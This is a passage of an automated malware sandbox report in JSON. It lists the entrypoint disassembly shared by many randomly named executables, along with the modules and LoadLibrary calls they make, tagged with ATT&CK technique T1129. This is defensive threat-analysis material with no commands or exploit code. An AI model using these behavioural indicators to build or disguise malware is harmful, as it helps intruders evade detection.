\"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"482486.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0484408.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2226066.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"60440.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2822060.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"46000.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"644802.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"288022.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"446022.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fdrnfdr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"vftrx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"06626.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"28482.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"0260006.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"44628.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"xlrdpdb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"lnxndll.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"8028040.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"ndfntv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"lvvdvpj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"460060.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"8420244.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"bdppl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"dtxrlp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"pdbtf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"pbbvvxt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"jftjpxt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"64226.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"28800.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"20046.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"8608268.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"6062268.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"6884282.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000\n \"4688686.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77030000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0260006.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"0260006.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0260006.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"0260006.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0260006.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"0260006.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"xlrdpdb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"xlrdpdb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xlrdpdb.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"xlrdpdb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xlrdpdb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"lnxndll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"lnxndll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lnxndll.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"lnxndll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lnxndll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"8028040.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"8028040.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8028040.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"8028040.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8028040.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"ndfntv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"ndfntv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ndfntv.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"ndfntv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ndfntv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"lvvdvpj.exe\" loaded module \"MSVCRT.DLL\" at base 77100000\n \"lvvdvpj.exe\" loaded module \"SHLWAPI.DLL\" at base 76010000\n \"lvvdvpj.exe\" loaded module \"USER32.DLL\" at base 771b0000\n \"lvvdvpj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"460060.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"8420244.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"8420244.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8420244.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"8420244.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8420244.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"8420244.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"bdppl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"bdppl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bdppl.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"bdppl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bdppl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"bdppl.exe\" loaded module \"KERNEL32.DLL\" at base 75b70000\n \"bdppl.exe\" loaded module \"MSVCRT.DLL\" at base 77100000\n \"bdppl.exe\" loaded module \"SHLWAPI.DLL\" at base 76010000\n \"bdppl.exe\" loaded module \"USER32.DLL\" at base 771b0000\n \"bdppl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"dtxrlp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"dtxrlp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dtxrlp.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"dtxrlp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dtxrlp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"pdbtf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"pdbtf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pdbtf.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"pdbtf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pbbvvxt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"pbbvvxt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pbbvvxt.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"pbbvvxt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64226.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"64226.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64226.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"64226.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64226.exe\" loaded module \"KERNEL32.DLL\" at base 75b70000\n \"64226.exe\" loaded module \"MSVCRT.DLL\" at base 77100000\n \"64226.exe\" loaded module \"SHLWAPI.DLL\" at base 76010000\n \"64226.exe\" loaded module \"USER32.DLL\" at base 771b0000\n \"64226.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"8608268.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"8608268.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8608268.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"8608268.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8608268.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"6062268.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"6062268.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6062268.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"6062268.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6062268.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"4240462.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"4240462.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4240462.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"4240462.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4240462.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"vpdhr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"xffxhjl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"xffxhjl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xffxhjl.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"xffxhjl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xffxhjl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"rptdfh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"rptdfh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rptdfh.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"rptdfh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rptdfh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"jxhdr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"blphnxr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"blphnxr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"blphnxr.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"blphnxr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"blphnxr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"hpfbrjf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"frljb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"frljb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"frljb.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"frljb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"frljb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"64826.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"64826.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64826.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"64826.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64826.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"64600.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"64600.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64600.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"64600.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64600.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"64600.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"642428.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"642428.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"642428.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"642428.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"642428.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"444002.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"444002.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"444002.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"444002.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"444002.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"444002.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"620262.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"620262.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"620262.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"620262.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"620262.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"620262.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"628644.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"628644.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"628644.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"628644.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"628644.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"628644.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"00288.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"00288.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"00288.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"00288.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"00288.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"jdrfr.exe\" loaded module \"MSVCRT.DLL\" at base 77100000\n \"jdrfr.exe\" loaded module \"SHLWAPI.DLL\" at base 76010000\n \"jdrfr.exe\" loaded module \"USER32.DLL\" at base 771b0000\n \"jdrfr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000\n \"jjtrtt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"jjtrtt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jjtrtt.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"jjtrtt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjtrtt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"nvpvtb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"nvpvtb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nvpvtb.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"nvpvtb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nvpvtb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"jptlrlr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"jptlrlr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jptlrlr.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"jptlrlr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jptlrlr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"jbvpj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71810000\n \"jbvpj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jbvpj.exe\" loaded module \"KERNEL32\" at base 75b70000\n \"jbvpj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jbvpj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a1e0000\n \"446022.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75030000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0260006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004428)\n \"0260006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004428)\n \"0260006.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004428)\n \"0260006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004428)\n \"xlrdpdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000864)\n \"xlrdpdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000864)\n \"xlrdpdb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000864)\n \"xlrdpdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000864)\n \"lnxndll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004064)\n \"lnxndll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004064)\n \"lnxndll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004064)\n \"lnxndll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004064)\n \"8028040.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004168)\n \"8028040.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004168)\n \"8028040.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004168)\n \"8028040.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004168)\n \"ndfntv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 